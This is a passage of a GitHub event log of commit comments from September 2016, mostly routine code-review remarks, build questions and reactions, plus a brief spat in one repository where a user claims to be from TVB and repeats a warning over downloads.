{"id":"4613837587","type":"CommitCommentEvent","actor":{"login":"sergeyklay"},"repo":{"name":"phalcon/docs"},"payload":{"comment":{"id":19162888,"position":null,"line":null,"path":null,"commit_id":"80fa95931b1fac726f3c79ef4fc36692f23913a9","created_at":"2016-09-25T07:43:56Z","updated_at":"2016-09-25T07:43:56Z","body":"👍 "}},"created_at":"2016-09-25T07:43:56Z"}
{"id":"4613837680","type":"CommitCommentEvent","actor":{"login":"dpeddi"},"repo":{"name":"lede-project/source"},"payload":{"comment":{"id":19162889,"position":null,"line":null,"path":null,"commit_id":"2dc7f99662a5d1da154ec02e3a22ad53c0144377","created_at":"2016-09-25T07:44:01Z","updated_at":"2016-09-25T07:44:01Z","body":"hi,\r\nhttps://github.com/pgid69/bcm63xx-phone add support for fxs on this platform.\r\n\r\nPlease can you consider to change CONFIG_SPI_BCM63XX=y to CONFIG_SPI_BCM63XX=m and eventually add  https://github.com/pgid69/bcm63xx-phone  to the feeds?\r\n\r\nRegards\r\nEddi\r\n\r\n"}},"created_at":"2016-09-25T07:44:01Z"}
{"id":"4613837714","type":"CommitCommentEvent","actor":{"login":"killets"},"repo":{"name":"killets/Algorithm-Problems"},"payload":{"comment":{"id":19162890,"position":null,"line":null,"path":null,"commit_id":"a3ab086495cf90090fd790e98c2b1f958d17e969","created_at":"2016-09-25T07:44:04Z","updated_at":"2016-09-25T07:44:04Z","body":"即使还是区分odd even模式，可以将其作为一个函数调用，传入两种不同的参数"}},"created_at":"2016-09-25T07:44:04Z"}
{"id":"4613841477","type":"CommitCommentEvent","actor":{"login":"infotvbcom"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162893,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T07:47:41Z","updated_at":"2016-09-25T07:47:41Z","body":"please send \"https://github.com/hklcf/myTV-api/commit/c687d4c32fb85233f98ef17109d900222ce5696b\" to info@tvb.com\r\nu will get a month mytvsper free"}},"created_at":"2016-09-25T07:47:41Z"}
{"id":"4613842755","type":"CommitCommentEvent","actor":{"login":"CookiesBestDinner"},"repo":{"name":"craigemery/vim-autotag"},"payload":{"comment":{"id":19162894,"position":26,"line":24,"path":"plugin/autotag.vim","commit_id":"9550755752c25997795d1134af8a87f739e1b0b6","created_at":"2016-09-25T07:48:45Z","updated_at":"2016-09-25T07:48:45Z","body":"That looks a little off to me (__future -> __future__ and print_statement -> print_function)"}},"created_at":"2016-09-25T07:48:45Z"}
{"id":"4613843449","type":"CommitCommentEvent","actor":{"login":"camirmas"},"repo":{"name":"camirmas/grapple"},"payload":{"comment":{"id":19162895,"position":7,"line":181,"path":"lib/grapple/hook.ex","commit_id":"18581c96872c19a0eddd112210089b0167a2d481","created_at":"2016-09-25T07:49:26Z","updated_at":"2016-09-25T07:49:26Z","body":"Oops missing comma, rebase?"}},"created_at":"2016-09-25T07:49:26Z"}
{"id":"4613843477","type":"CommitCommentEvent","actor":{"login":"infotvbcom"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162896,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T07:49:28Z","updated_at":"2016-09-25T07:49:28Z","body":"we will call 999 because u download mytvsuper "}},"created_at":"2016-09-25T07:49:28Z"}
{"id":"4613845693","type":"CommitCommentEvent","actor":{"login":"aurusov"},"repo":{"name":"aurusov/raox-models"},"payload":{"comment":{"id":19162897,"position":447,"line":324,"path":"models/fms.rao","commit_id":"00cb0c6ed116ca6a84426dc78e21a72da08e0690","created_at":"2016-09-25T07:51:40Z","updated_at":"2016-09-25T07:51:40Z","body":"https://github.com/aurusov/raox/issues/459"}},"created_at":"2016-09-25T07:51:40Z"}
{"id":"4613846000","type":"CommitCommentEvent","actor":{"login":"camirmas"},"repo":{"name":"camirmas/grapple"},"payload":{"comment":{"id":19162898,"position":7,"line":181,"path":"lib/grapple/hook.ex","commit_id":"18581c96872c19a0eddd112210089b0167a2d481","created_at":"2016-09-25T07:52:00Z","updated_at":"2016-09-25T07:52:00Z","body":"Or rather, --amend"}},"created_at":"2016-09-25T07:52:00Z"}
{"id":"4613848966","type":"CommitCommentEvent","actor":{"login":"nagachika"},"repo":{"name":"ruby/ruby"},"payload":{"comment":{"id":19162900,"position":null,"line":null,"path":null,"commit_id":"c9dd5918f40dc6df3a237f634b9689bfbb591662","created_at":"2016-09-25T07:54:53Z","updated_at":"2016-09-25T07:54:53Z","body":"@zenspider Any progress on minitest gem release?\r\nRubyCI for ruby_2_3 branch were continuously failing because of certificate check of minitest-5.8.3.gem. I'd like to get new release on 5.8.x series too. Thanks."}},"created_at":"2016-09-25T07:54:53Z"}
{"id":"4613854812","type":"CommitCommentEvent","actor":{"login":"wcxaaa"},"repo":{"name":"wcxaaa/wcnexus.com"},"payload":{"comment":{"id":19162903,"position":null,"line":null,"path":null,"commit_id":"01a4854c8c1cfcd54d95b134a860b82e843ff98b","created_at":"2016-09-25T08:00:14Z","updated_at":"2016-09-25T08:00:14Z","body":"vBlogCategory！！！！！\r\n玛德这都可以说错 💫 "}},"created_at":"2016-09-25T08:00:14Z"}
{"id":"4613859180","type":"CommitCommentEvent","actor":{"login":"afc163"},"repo":{"name":"react-component/calendar"},"payload":{"comment":{"id":19162910,"position":8,"line":9,"path":"HISTORY.md","commit_id":"b6f2e1c710dc469173e331b081886244073611a1","created_at":"2016-09-25T08:04:02Z","updated_at":"2016-09-25T08:04:02Z","body":"这个不向下兼容有点凶残啊。"}},"created_at":"2016-09-25T08:04:02Z"}
{"id":"4613860229","type":"CommitCommentEvent","actor":{"login":"xdevs23"},"repo":{"name":"halogenOS/android_build"},"payload":{"comment":{"id":19162911,"position":null,"line":null,"path":null,"commit_id":"fcc4b2fc143062f8051ba81133d68ac41d69deab","created_at":"2016-09-25T08:04:59Z","updated_at":"2016-09-25T08:04:59Z","body":"Your iPhone is not aggressive. It's just enforcing.\n\nAm 25.09.2016 4:25 vorm. schrieb \"Hunter Ashton\" <notifications@github.com>:\n\n> My machine is very aggressive ;)\n>\n> Sent from my iPhone\n>\n> > On Sep 24, 2016, at 2:23 PM, Neil Agarwal <notifications@github.com>\n> wrote:\n> >\n> > k\n> >\n> > —\n> > You are receiving this because you are subscribed to this thread.\n> > Reply to this email directly, view it on GitHub, or mute the thread.\n> >\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/halogenOS/android_build/commit/fcc4b2fc143062f8051ba81133d68ac41d69deab#commitcomment-19161753>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGowjepSr99I872xSP6wuPq2U7-Bv_3Uks5qtduLgaJpZM4KFK5G>\n> .\n>\n"}},"created_at":"2016-09-25T08:04:59Z"}
{"id":"4613861380","type":"CommitCommentEvent","actor":{"login":"lukacu"},"repo":{"name":"votchallenge/vot-toolkit"},"payload":{"comment":{"id":19162912,"position":null,"line":null,"path":null,"commit_id":"75238a99b371b8911d46cde9dde4a92a8e42d919","created_at":"2016-09-25T08:06:05Z","updated_at":"2016-09-25T08:06:05Z","body":"I did not notice this one, we are not using md5sum, but a toolkit provided md5hash, this was now fixed with #96 ."}},"created_at":"2016-09-25T08:06:05Z"}
{"id":"4613867108","type":"CommitCommentEvent","actor":{"login":"Promise-Devotion"},"repo":{"name":"Promise-Devotion/someDemo"},"payload":{"comment":{"id":19162917,"position":null,"line":null,"path":null,"commit_id":"528ff545a83dc9573a75b18a5a6e579a5c30a302","created_at":"2016-09-25T08:11:10Z","updated_at":"2016-09-25T08:11:10Z","body":"merge request"}},"created_at":"2016-09-25T08:11:10Z"}
{"id":"4613868014","type":"CommitCommentEvent","actor":{"login":"Promise-Devotion"},"repo":{"name":"Promise-Devotion/someDemo"},"payload":{"comment":{"id":19162918,"position":null,"line":null,"path":null,"commit_id":"528ff545a83dc9573a75b18a5a6e579a5c30a302","created_at":"2016-09-25T08:11:58Z","updated_at":"2016-09-25T08:11:58Z","body":"merge request"}},"created_at":"2016-09-25T08:11:58Z"}
{"id":"4613869806","type":"CommitCommentEvent","actor":{"login":"mitchelldavis44"},"repo":{"name":"maruos/manifest"},"payload":{"comment":{"id":19162919,"position":null,"line":null,"path":null,"commit_id":"52c4979992d7fad58387b0303a0fbcaa434c70d0","created_at":"2016-09-25T08:13:31Z","updated_at":"2016-09-25T08:13:31Z","body":"I keep trying to sync the manifest but I am getting errors with the following:\r\n\r\nfatal: Not a git repository: '/home/mitch/android/system/.repo/projects/external/easymock.git'\r\nfatal: Not a git repository: '/home/mitch/android/system/.repo/projects/external/easymock.git'\r\nerror: Cannot fetch platform/external/easymock\r\n\r\nerror: Exited sync due to fetch errors\r\n\r\nWhat am I missing?"}},"created_at":"2016-09-25T08:13:31Z"}
{"id":"4613872430","type":"CommitCommentEvent","actor":{"login":"mcccs"},"repo":{"name":"ThisTestUser/Docs"},"payload":{"comment":{"id":19162921,"position":null,"line":null,"path":null,"commit_id":"ee739e1721641f4655aafd3d0cddd9b7defd69f0","created_at":"2016-09-25T08:15:46Z","updated_at":"2016-09-25T08:15:46Z","body":"No, I haven't seen any pop-ups."}},"created_at":"2016-09-25T08:15:46Z"}
{"id":"4613872948","type":"CommitCommentEvent","actor":{"login":"cham8899"},"repo":{"name":"yatrack/project1"},"payload":{"comment":{"id":19162922,"position":null,"line":null,"path":null,"commit_id":"35f0728dcfb4b1c99d51bb6f549558d1b634b9ac","created_at":"2016-09-25T08:16:13Z","updated_at":"2016-09-25T08:16:13Z","body":"dd"}},"created_at":"2016-09-25T08:16:13Z"}
{"id":"4613874721","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/manjaro-tools-iso-profiles"},"payload":{"comment":{"id":19162923,"position":null,"line":null,"path":null,"commit_id":"56ed2c5e38763f59bebeb606311a122e75091c1e","created_at":"2016-09-25T08:17:37Z","updated_at":"2016-09-25T08:17:37Z","body":"Both profiles work perfectly fine, see here [i3](https://forum.manjaro.org/t/manjaro-i3-hybrid-for-testing/9391/40) and [cinnamon](https://forum.manjaro.org/t/manjaro-cinnamon-hybrid-unstable-branch-for-testing/9748/9) but I understood that they were not welcome. Removing the option for individual hybrid.yaml files breaks them because Calamares can not be set to source the package lists for installation."}},"created_at":"2016-09-25T08:17:37Z"}
{"id":"4613876009","type":"CommitCommentEvent","actor":{"login":"infotvbcom"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162924,"position":null,"line":null,"path":null,"commit_id":"375fa7520455b53fad622c0149a473ebee048e15","created_at":"2016-09-25T08:18:47Z","updated_at":"2016-09-25T08:18:47Z","body":"@hklcf\r\nI come from tvb , warning u. I have post this address to tvb. and send hklcf's address to tvb\r\nwe will call 999 because u download mytvsuper"}},"created_at":"2016-09-25T08:18:47Z"}
{"id":"4613876947","type":"CommitCommentEvent","actor":{"login":"davidromani"},"repo":{"name":"Flexible-User-Experience/Espai-Kowo"},"payload":{"comment":{"id":19162925,"position":null,"line":null,"path":null,"commit_id":"69f89c04d79561b3d7f41083bebf2f33d56f3ef9","created_at":"2016-09-25T08:19:39Z","updated_at":"2016-09-25T08:19:39Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Improve Insights score](https://trello.com/c/YOhzNYnb/22-improve-insights-score)"}},"created_at":"2016-09-25T08:19:39Z"}
{"id":"4613878376","type":"CommitCommentEvent","actor":{"login":"terryyin"},"repo":{"name":"vanzaj/yoda_this"},"payload":{"comment":{"id":19162926,"position":1,"line":1,"path":"yoda.py","commit_id":"1aef513beeaaec0da085403ea76ebaf8fbdf85c6","created_at":"2016-09-25T08:20:50Z","updated_at":"2016-09-25T08:20:50Z","body":"The variable z can be replaced by `__doc__`, I think."}},"created_at":"2016-09-25T08:20:50Z"}
{"id":"4613879150","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/manjaro-tools-iso-profiles"},"payload":{"comment":{"id":19162928,"position":null,"line":null,"path":null,"commit_id":"56ed2c5e38763f59bebeb606311a122e75091c1e","created_at":"2016-09-25T08:21:28Z","updated_at":"2016-09-25T08:21:28Z","body":"Since the option has been re-enabled - thank you @philmmanjaro - I might add the profiles in the minimal category. Minimal install media of a given profile with the option to install more packages via **calamares** seem useful to me."}},"created_at":"2016-09-25T08:21:28Z"}
{"id":"4613879163","type":"CommitCommentEvent","actor":{"login":"Savion"},"repo":{"name":"Savion/Mushy"},"payload":{"comment":{"id":19162929,"position":null,"line":null,"path":null,"commit_id":"4600f87a5a50c8c0d2ac85c05d3bc967733f4ac4","created_at":"2016-09-25T08:21:28Z","updated_at":"2016-09-25T08:21:28Z","body":"Adding a hook here to allow us to see which packets are being sent to the client from the server.\r\nWe already have the functionality for Receive, just need this for send. This will alleviate the need for MapleShark to see packets going in/out.\r\n "}},"created_at":"2016-09-25T08:21:28Z"}
{"id":"4613880882","type":"CommitCommentEvent","actor":{"login":"infotvbcom"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162934,"position":null,"line":null,"path":null,"commit_id":"375fa7520455b53fad622c0149a473ebee048e15","created_at":"2016-09-25T08:23:02Z","updated_at":"2016-09-25T08:23:02Z","body":"@hklcf\r\nI come from tvb , warning u. I have post this address to tvb. and send hklcf's address to tvb\r\nwe will call 999 because u download mytvsuper"}},"created_at":"2016-09-25T08:23:02Z"}
{"id":"4613882459","type":"CommitCommentEvent","actor":{"login":"rsrilaks"},"repo":{"name":"vanamraghu/HelloWorld"},"payload":{"comment":{"id":19162935,"position":null,"line":null,"path":null,"commit_id":"96b3ba6f888182577ece1c89eb522d2b73f6278b","created_at":"2016-09-25T08:24:29Z","updated_at":"2016-09-25T08:24:29Z","body":"Changes by Lakshmi"}},"created_at":"2016-09-25T08:24:29Z"}
{"id":"4613883148","type":"CommitCommentEvent","actor":{"login":"Turbo87"},"repo":{"name":"ember-cli/broccoli-lint-eslint"},"payload":{"comment":{"id":19162937,"position":null,"line":null,"path":null,"commit_id":"c3c027e1b1d6310ece8c866e9ff253f2a2d25cde","created_at":"2016-09-25T08:25:07Z","updated_at":"2016-09-25T08:25:07Z","body":"![bildschirmfoto 2016-09-25 um 10 23 39](https://cloud.githubusercontent.com/assets/141300/18813902/4bcfd3f0-830a-11e6-84a2-22e816d53756.png)\r\n\r\n😕 "}},"created_at":"2016-09-25T08:25:07Z"}
{"id":"4613883966","type":"CommitCommentEvent","actor":{"login":"lakb8"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162938,"position":null,"line":null,"path":null,"commit_id":"375fa7520455b53fad622c0149a473ebee048e15","created_at":"2016-09-25T08:25:54Z","updated_at":"2016-09-25T08:25:54Z","body":"@infotvbcom call 999 because  download mytvsuper?\r\nWTF"}},"created_at":"2016-09-25T08:25:54Z"}
{"id":"4613884868","type":"CommitCommentEvent","actor":{"login":"lakb8"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162940,"position":null,"line":null,"path":null,"commit_id":"375fa7520455b53fad622c0149a473ebee048e15","created_at":"2016-09-25T08:26:37Z","updated_at":"2016-09-25T08:26:37Z","body":"A U KIDDING ME?"}},"created_at":"2016-09-25T08:26:37Z"}
{"id":"4613885723","type":"CommitCommentEvent","actor":{"login":"hklcf"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162941,"position":null,"line":null,"path":null,"commit_id":"375fa7520455b53fad622c0149a473ebee048e15","created_at":"2016-09-25T08:27:26Z","updated_at":"2016-09-25T08:27:26Z","body":"@infotvbcom \r\nDon't waste my time for watching or download fucking cctvb.\r\n"}},"created_at":"2016-09-25T08:27:26Z"}
{"id":"4613886201","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19162944,"position":null,"line":null,"path":null,"commit_id":"698f30f7215dc7335a9801cf59e7b342f5fe099c","created_at":"2016-09-25T08:27:55Z","updated_at":"2016-09-25T08:27:55Z","body":"In fact a better description would be \"*protected by a knight or a pawn*\", because the effect of this patch on reachable outposts and outposts is the following:\r\n\r\n• for reachable outposts (the piece has not yet landed on the outpost):\r\n\r\na) bishop, outpost square protected by pawn: bigger bonus\r\nb) bishop, outpost square protected by knight: **bigger bonus**\r\nc) bishop, outpost square protected by 2 bishops (very rare): **bigger bonus**\r\nd) knight, outpost square protected by pawn: bigger bonus\r\ne) knight, outpost square protected by another knight : **bigger bonus for the second knight**\r\nf) knight, outpost square protected by bishop: nothing (but see b)\r\n\r\n• for outposts pieces (the piece has already landed on the outpost):\r\n\r\na) bishop, outpost protected by pawn: bigger bonus\r\nb) bishop, outpost protected by knight: **bigger bonus**\r\nc) bishop, outpost protected by 2 bishops (very rare): **bigger bonus**\r\nd) knight, outpost protected by pawn: bigger bonus\r\ne) knight, outpost protected by another knight : **bigger bonus**\r\nf) knight, outpost protected by bishop: nothing (this is a miss, not easy to fix)"}},"created_at":"2016-09-25T08:27:55Z"}
{"id":"4613889141","type":"CommitCommentEvent","actor":{"login":"hklcf"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162946,"position":null,"line":null,"path":null,"commit_id":"375fa7520455b53fad622c0149a473ebee048e15","created_at":"2016-09-25T08:30:26Z","updated_at":"2016-09-25T08:30:26Z","body":"![image](https://cloud.githubusercontent.com/assets/410302/18813921/5b40b3e4-833d-11e6-8cc3-49acb40deafc.png)\r\n"}},"created_at":"2016-09-25T08:30:26Z"}
{"id":"4613891870","type":"CommitCommentEvent","actor":{"login":"Altaf-Mahdi"},"repo":{"name":"lg-devs/proprietary_vendor_lge"},"payload":{"comment":{"id":19162947,"position":null,"line":null,"path":null,"commit_id":"42754beef8991e7ea188df2062f75a85ab08eb0c","created_at":"2016-09-25T08:32:50Z","updated_at":"2016-09-25T08:32:50Z","body":"Hey @Rashed97, would you be able to grab libllvm-qgl.so which would fully enable vulkan? "}},"created_at":"2016-09-25T08:32:50Z"}
{"id":"4613895775","type":"CommitCommentEvent","actor":{"login":"ochiait"},"repo":{"name":"ochiait/kadai_asagao"},"payload":{"comment":{"id":19162950,"position":null,"line":null,"path":null,"commit_id":"f8e3f06cc4d73ae9f8aa662be247df189cc9a8c4","created_at":"2016-09-25T08:36:20Z","updated_at":"2016-09-25T08:36:20Z","body":"4W練-1_categoryカラム追加\r\nも含まれている\r\nrails g migration AddCategoryToCalendar_items category:integer"}},"created_at":"2016-09-25T08:36:20Z"}
{"id":"4613895874","type":"CommitCommentEvent","actor":{"login":"PunkUnity"},"repo":{"name":"Bliss-CAF/platform_manifest"},"payload":{"comment":{"id":19162951,"position":null,"line":null,"path":null,"commit_id":"dd0d40ebb83eca5f2b948f296b821249fc622a56","created_at":"2016-09-25T08:36:25Z","updated_at":"2016-09-25T08:36:25Z","body":"NIce. Now let's update the build instructions for CAF so someone doesn't drunkily init the wrong deal"}},"created_at":"2016-09-25T08:36:25Z"}
{"id":"4613897720","type":"CommitCommentEvent","actor":{"login":"seccoding"},"repo":{"name":"wogudnn/BBS"},"payload":{"comment":{"id":19162954,"position":7,"line":0,"path":".classpath","commit_id":"121ae35f6d98be163b76c1bb71d8d74f6dbad1f9","created_at":"2016-09-25T08:37:49Z","updated_at":"2016-09-25T08:37:49Z","body":"ㅊ"}},"created_at":"2016-09-25T08:37:49Z"}
{"id":"4613898538","type":"CommitCommentEvent","actor":{"login":"masayukisumi"},"repo":{"name":"masayukisumi/Audio"},"payload":{"comment":{"id":19162957,"position":null,"line":null,"path":null,"commit_id":"59ebdb6a1575db1ada9886be5bd2c2016a7b730a","created_at":"2016-09-25T08:38:29Z","updated_at":"2016-09-25T08:38:29Z","body":"easiest way to try STT(Speech To Text)"}},"created_at":"2016-09-25T08:38:29Z"}
{"id":"4613898922","type":"CommitCommentEvent","actor":{"login":"Manmohan96"},"repo":{"name":"atpadikar/TumTum-Schedule"},"payload":{"comment":{"id":19162958,"position":null,"line":null,"path":null,"commit_id":"6e6961af4df3a7ec19e70c58af74239ca7969c54","created_at":"2016-09-25T08:38:50Z","updated_at":"2016-09-25T08:38:50Z","body":"cas.route1 = [05 06 07 10 11];\r\ncas.route2 = [05 06 04 03 02 01 09 10 11];\r\ncas.route3 = [08 09 10 11];"}},"created_at":"2016-09-25T08:38:50Z"}
{"id":"4613901478","type":"CommitCommentEvent","actor":{"login":"mizut"},"repo":{"name":"v-kinoshita1022/intro-curriculum-3008"},"payload":{"comment":{"id":19162960,"position":null,"line":null,"path":null,"commit_id":"e4223a0865c5264180bbfaf164507e081d59e531","created_at":"2016-09-25T08:41:06Z","updated_at":"2016-09-25T08:41:06Z","body":"> コメントに絵文字の挿入するのってどうやってやるんですか？\r\n\r\n返信の方法がわからなかったのでこちらのコミットコメントから失礼します。\r\n私はSKKというIMEを使っているので↓の辞書を入れて入力しました。\r\nhttps://github.com/uasi/skk-emoji-jisyo\r\n\r\nMS-IMEにも↓のような辞書があるようです。\r\nhttps://gist.github.com/hail2u/869169fdf25393b48e8a\r\n\r\n\r\nその他のIMEをご使用の場合は「使用しているIME名 絵文字 辞書」等で検索すればたぶん出てくると思います。"}},"created_at":"2016-09-25T08:41:06Z"}
{"id":"4613903112","type":"CommitCommentEvent","actor":{"login":"lailamaharon"},"repo":{"name":"lailamaharon/beanstalk_console"},"payload":{"comment":{"id":19162962,"position":null,"line":null,"path":null,"commit_id":"fc0d6757537802a741ebcf82f2fe4e65307c9953","created_at":"2016-09-25T08:42:29Z","updated_at":"2016-09-25T08:42:29Z","body":"I love rock n roll. ^-^"}},"created_at":"2016-09-25T08:42:29Z"}
{"id":"4613903562","type":"CommitCommentEvent","actor":{"login":"xiasf"},"repo":{"name":"top-think/framework"},"payload":{"comment":{"id":19162963,"position":4,"line":64,"path":"lang/zh-cn.php","commit_id":"f913450da88512dceb15760c5780a060225c88bc","created_at":"2016-09-25T08:42:47Z","updated_at":"2016-09-25T08:42:47Z","body":"赞"}},"created_at":"2016-09-25T08:42:47Z"}
{"id":"4613904305","type":"CommitCommentEvent","actor":{"login":"xiasf"},"repo":{"name":"top-think/framework"},"payload":{"comment":{"id":19162964,"position":2,"line":62,"path":"lang/zh-cn.php","commit_id":"f913450da88512dceb15760c5780a060225c88bc","created_at":"2016-09-25T08:43:20Z","updated_at":"2016-09-25T08:43:20Z","body":"嘻嘻"}},"created_at":"2016-09-25T08:43:20Z"}
{"id":"4613905239","type":"CommitCommentEvent","actor":{"login":"xeusfear"},"repo":{"name":"xeusfear/ehsan"},"payload":{"comment":{"id":19162965,"position":5,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-25T08:44:09Z","updated_at":"2016-09-25T08:44:09Z","body":"{\r\n205901830\r\n},\r\n"}},"created_at":"2016-09-25T08:44:09Z"}
{"id":"4613905510","type":"CommitCommentEvent","actor":{"login":"TimSchumi"},"repo":{"name":"CyanogenMod/android_external_iproute2"},"payload":{"comment":{"id":19162966,"position":null,"line":null,"path":null,"commit_id":"4c48963517f1569ce909ad2f8a4b7a675de5a1f6","created_at":"2016-09-25T08:44:23Z","updated_at":"2016-09-25T08:44:23Z","body":"How to fix this error when using prebuilt kernel?"}},"created_at":"2016-09-25T08:44:23Z"}
{"id":"4613906210","type":"CommitCommentEvent","actor":{"login":"nikswamy"},"repo":{"name":"FStarLang/FStar"},"payload":{"comment":{"id":19162967,"position":null,"line":null,"path":null,"commit_id":"9c472a013eeebb116b9de703e0bddc02f916feaf","created_at":"2016-09-25T08:45:04Z","updated_at":"2016-09-25T08:45:04Z","body":"Was this really about changing the file name? Or did the parsing difference show up because of F# vs OCaml?"}},"created_at":"2016-09-25T08:45:04Z"}
{"id":"4613906225","type":"CommitCommentEvent","actor":{"login":"dennis-tra"},"repo":{"name":"finn-christiansen/solidstate"},"payload":{"comment":{"id":19162968,"position":null,"line":null,"path":null,"commit_id":"cf62ed7c33f57bea3355d9b3d2af5ca990d466ca","created_at":"2016-09-25T08:45:04Z","updated_at":"2016-09-25T08:45:04Z","body":"Top 👍 "}},"created_at":"2016-09-25T08:45:04Z"}
{"id":"4613906552","type":"CommitCommentEvent","actor":{"login":"tbug"},"repo":{"name":"tbug/tbug.github.io"},"payload":{"comment":{"id":19162969,"position":181,"line":228,"path":"_posts/2016-03-28-initial-thoughts-on-elixir.md","commit_id":"28edaab38d71e599a27d7f41cccd0cb90b568de6","created_at":"2016-09-25T08:45:20Z","updated_at":"2016-09-25T08:45:20Z","body":"Lol. 👍"}},"created_at":"2016-09-25T08:45:20Z"}
{"id":"4613908865","type":"CommitCommentEvent","actor":{"login":"Arcanium"},"repo":{"name":"Arcanium/Action-Dice"},"payload":{"comment":{"id":19162971,"position":null,"line":null,"path":null,"commit_id":"63fcf8daee92520e1d6030d4cba91ec48ffb8c32","created_at":"2016-09-25T08:47:24Z","updated_at":"2016-09-25T08:47:24Z","body":"By that I mean the order, the alphabetization."}},"created_at":"2016-09-25T08:47:24Z"}
{"id":"4613909852","type":"CommitCommentEvent","actor":{"login":"Liryna"},"repo":{"name":"dokan-dev/dokany"},"payload":{"comment":{"id":19162972,"position":null,"line":null,"path":null,"commit_id":"7960517074f7a7e84ebbb95bf128c4ae519102ee","created_at":"2016-09-25T08:48:12Z","updated_at":"2016-09-25T08:48:12Z","body":"@Rondom appveyor seems to take too much time to build it 😢 \r\ncygwin + appveyor != ❤️ "}},"created_at":"2016-09-25T08:48:12Z"}
{"id":"4613910975","type":"CommitCommentEvent","actor":{"login":"AnthonyMDev"},"repo":{"name":"AnthonyMDev/BRYXBanner"},"payload":{"comment":{"id":19162973,"position":37,"line":137,"path":"Pod/Classes/Banner.swift","commit_id":"b0de4a92b520e48fea216ca9004bbbec61ac0522","created_at":"2016-09-25T08:49:17Z","updated_at":"2016-09-25T08:49:17Z","body":"#outlook a {\n\npadding: 0;\n}\n.ReadMsgBody {\n\nwidth: 100%;\n}\n.ExternalClass {\n\nwidth: 100%;\n}\n.ExternalClass, .ExternalClass p, .ExternalClass span, .ExternalClass font, .ExternalClass td, .ExternalClass div {\n\nline-height: 100%;\n}\nbody, table, td, a {\n\n-webkit-text-size-adjust: 100%;\n\n-ms-text-size-adjust: 100%;\n}\ntable, td {\n\nmso-table-lspace: 0pt;\n\nmso-table-rspace: 0pt;\n}\nimg {\n\n-ms-interpolation-mode: bicubic;\n}\n\nbody {\n\nmargin: 0;\n\npadding: 0;\n\n}\nimg {\n\nborder: 0;\n\nheight: auto;\n\nline-height: 100%;\n\noutline: none;\n\ntext-decoration: none;\n}\ntable {\n\nborder-collapse: collapse !important;\n}\nbody {\n\nheight: 100% !important;\n\nmargin: 0;\n\npadding: 0;\n\nwidth: 100% !important;\n}\n\nappleBody a {\n\ncolor: #68440a;\n\ntext-decoration: none;\n}\n.appleFooter a {\n\ncolor: #999999;\n\ntext-decoration: none;\n}\n.faq {\n\nline-height: 18px;\n\nlist-style: outside none none;\n\nmargin: 10px 0;\n\npadding: 0;\n}\n.mobile-only {\n\ndisplay: none;\n}\n\n@media screen and (max-width: 525px) {\n\ntable[class=\"wrapper\"] {\n\nwidth: 100% !important;\n}\n\ntd[class=\"logo\"] {\n\ntext-align: left;\n\npadding: 20px 0 20px 0 !important;\n}\ntd[class=\"logo\"] img {\n\nmargin: 0 auto!important;\n}\n\n[class=\"mobile-only\"] {\n\ndisplay: block;\n}\n\nbr[class=\"mobile-hide\"] {\n\ndisplay: none;\n}\ntd[class=\"mobile-hide\"] {\n\ndisplay: none;\n}\nimg[class=\"mobile-hide\"] {\n\ndisplay: none !important;\n}\nimg[class=\"img-max\"] {\n\nmax-width: 100% !important;\n\nwidth: 100% !important;\n\nheight: auto !important;\n}\n\nimg[class=\"img-min\"] {\n\nmax-width: 73px !important;\n\nwidth: 73px !important;\n\nheight: auto !important;\n\npadding-top: 8px !important;\n}\n\nimg[class=\"img-apps\"] {\n\nmax-width: 46% !important;\n\nwidth: 46% !important;\n\nheight: auto !important;\n}\nimg[class=\"img-max-profile\"] {\n\nmax-width: 50% !important;\n\nwidth: 50% !important;\n\nheight: auto !important;\n\nborder-radius: 200px;\n}\n\ntable[class=\"responsive-table\"] {\n\nwidth: 100%!important;\n}\n\ntd[class=\"padding\"] {\n\npadding: 10px 5% 15px 5% !important;\n}\ntd[class=\"amount\"] {\n\nfont-size: 10px!important;\n}\ntd[class=\"mobile-text-twelve\"] {\n\nfont-size: 12px!important;\n}\nspan[class=\"mobile-text-twelve\"] {\n\nfont-size: 14px!important;\n}\ntd[class=\"padding-copy\"] {\n\npadding: 10px 5% 10px 5% !important;\n\ntext-align: center;\n}\ntd[class=\"padding-meta\"] {\n\npadding: 30px 5% 0px 5% !important;\n\ntext-align: center;\n}\ntd[class=\"no-pad\"] {\n\npadding: 0 0 20px 0 !important;\n}\ntd[class=\"no-pad-bottom\"] {\n\npadding: 25px 0 0 0 !important;\n}\ntd[class=\"no-padding\"] {\n\npadding: 0 !important;\n}\ntd[class=\"section-padding\"] {\n\npadding: 25px 15px 25px 15px !important;\n}\ntd[class=\"section-no-padding-bottom\"] {\n\npadding: 25px 15px 0 15px !important;\n}\n\ntd[class=\"section-no-padding-top\"] {\n\npadding: 0 5% 25px 5% !important;\n}\n\ntd[class=\"section-no-padding-top-bottom\"] {\n\npadding: 0 5% 0 5% !important;\n}\ntd[class=\"section-padding-bottom-image\"] {\n\npadding: 50px 15px 0 15px !important;\n}\n\ntd[class=\"mobile-wrapper\"] {\n\npadding: 10px 5% 15px 5% !important;\n}\ntable[class=\"mobile-button-container\"] {\n\nmargin: 0 auto;\n\nwidth: 100% !important;\n}\na[class=\"mobile-button\"] {\n\nwidth: 80% !important;\n\npadding: 15px !important;\n\nborder: 0 